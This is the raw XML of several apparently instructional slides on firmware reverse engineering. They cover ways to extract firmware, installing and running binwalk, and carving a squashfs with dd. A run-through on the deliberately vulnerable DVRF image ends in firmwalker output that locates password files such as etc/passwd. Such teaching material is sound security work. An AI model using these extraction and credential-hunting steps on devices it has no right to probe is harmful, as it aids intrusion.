              <a:t>From Wikipedia: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dnsmasq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> provides Domain Name System (DNS) forwarder, Dynamic Host Configuration Protocol (DHCP) server, router advertisement and network boot features for small computer networks.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C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A3C287C-E9BF-6646-9450-C49B632EEA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="750293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Reverse engineer firmware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1953490"/>
            <a:ext cx="11582400" cy="4549641"/>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To get firmware, do one of the following</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Download it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Extract via UART or JTAG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Over the air (OTA) sniffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Read it out of ROM or Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You may need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>desolder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>EEProms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> or Flash to do this.</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8BC2101D-8205-8A4F-94E3-0EA49520ACB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="900494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err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Ubuntu, Debian)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="1322713"/>
            <a:ext cx="11582400" cy="5216199"/>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Binwalk is a tool for analyzing, reverse engineering, and extracting firmware images. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Get it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To install:</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python3 setup.py install</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python-lzma</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pip install nose coverage</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python-crypto</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mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord</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zlib1g-dev liblzma-dev liblzo2-dev </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git clone https://github.com/devttys0/sasquatch </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cd sasquatch &amp;&amp; ./build.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo apt-get install liblzo2-dev python-lzo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Uninstall</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sudo python3 setup.py uninstall</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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2761349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0"/>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Binwalk example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1641801"/>
            <a:ext cx="11582400" cy="5216199"/>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firmware probably contains a bootloader, kernel and file system image which you can extract either manually or with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is just a smart grep looking for the right strings and magic numbers so there are lots of false positives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (after install)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>binwalk –t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firmware.bin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>displays file info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>binwalk –e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firmware.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>extracts file system</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Manual</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Use hexdump to identify file system.  For example, with the squashfs, we’ll find the bytes sqfs (say at binary location FS_LOC)</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dd if=firmware.bin skip=$(FS_LOC) bs=1 of=file_system.bin</a:t>
            </a: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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3348674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67469"/>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Binwalk run-through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1286933"/>
            <a:ext cx="11582400" cy="5216199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1"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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87B7D173-48F6-3A42-AF8F-2BCFE4A13B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777046" y="1600749"/>
            <a:ext cx="10881747" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>binwalk  DVRF_v03.bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DECIMAL       HEXADECIMAL     DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--------------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0                      0x0             BIN-Header, board ID: 1550, hardware version: 4702, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                           firmware version: 1.0.0, build date: 2012-02-08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="32"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                   0x20           TRX firmware header, little endian, image size: 7753728 bytes, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                           CRC32: 0x436822F6, flags: 0x0, version: 1, header size: 28 bytes, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                           loader offset: 0x1C, linux kernel offset: 0x192708, rootfs offset: 0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="60"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                   0x3C          gzip compressed data, maximum compression, has original file name: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                          "piggy", from Unix, last modified: 2016-03-09 08:08:31</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1648424          0x192728   Squashfs filesystem, little endian, non-standard signature, version 3.0, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                           size: 6099215 bytes, 447 inodes, blocksize: 65536 bytes, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                           created: 2016-03-10 04:34:22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2985201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Binwalk run-through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1697152"/>
            <a:ext cx="11582400" cy="5046865"/>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we extract the firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>binwalk -e DVRF_v03.bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>drwxr-xr-x 3 jlm jlm      4096 Jun  4 17:48 _DVRF_v03.bin-0.extracted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>drwxr-xr-x 3 jlm jlm      4096 Jun  4 17:44 _DVRF_v03.bin.extracted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cd _DVRF_v03.bin-0.extracted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ls -l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-rw-r--r-- 1 jlm jlm 6099215 Jun  4 17:44 192728.squashfs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-rw-r--r-- 1 jlm jlm 3874852 Jun  4 17:44 piggy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>drwxr-xr-x 2 jlm jlm    4096 Jun  4 17:44 squashfs-root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bin  dev  etc  lib  media  mnt  proc  pwnable  sbin  sys  tmp  usr  var  www</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run firmwalker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>./firmwalker.sh _DVRF_v03.bin-0.extracted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="16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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4155845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Binwalk run-through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1620982"/>
            <a:ext cx="11582400" cy="488215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Firmwalker output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>_DVRF_v03.bin-0.extracted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>***Search for password files***</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>##################################### passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/bin/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>***Search for files***</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>##################################### *.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
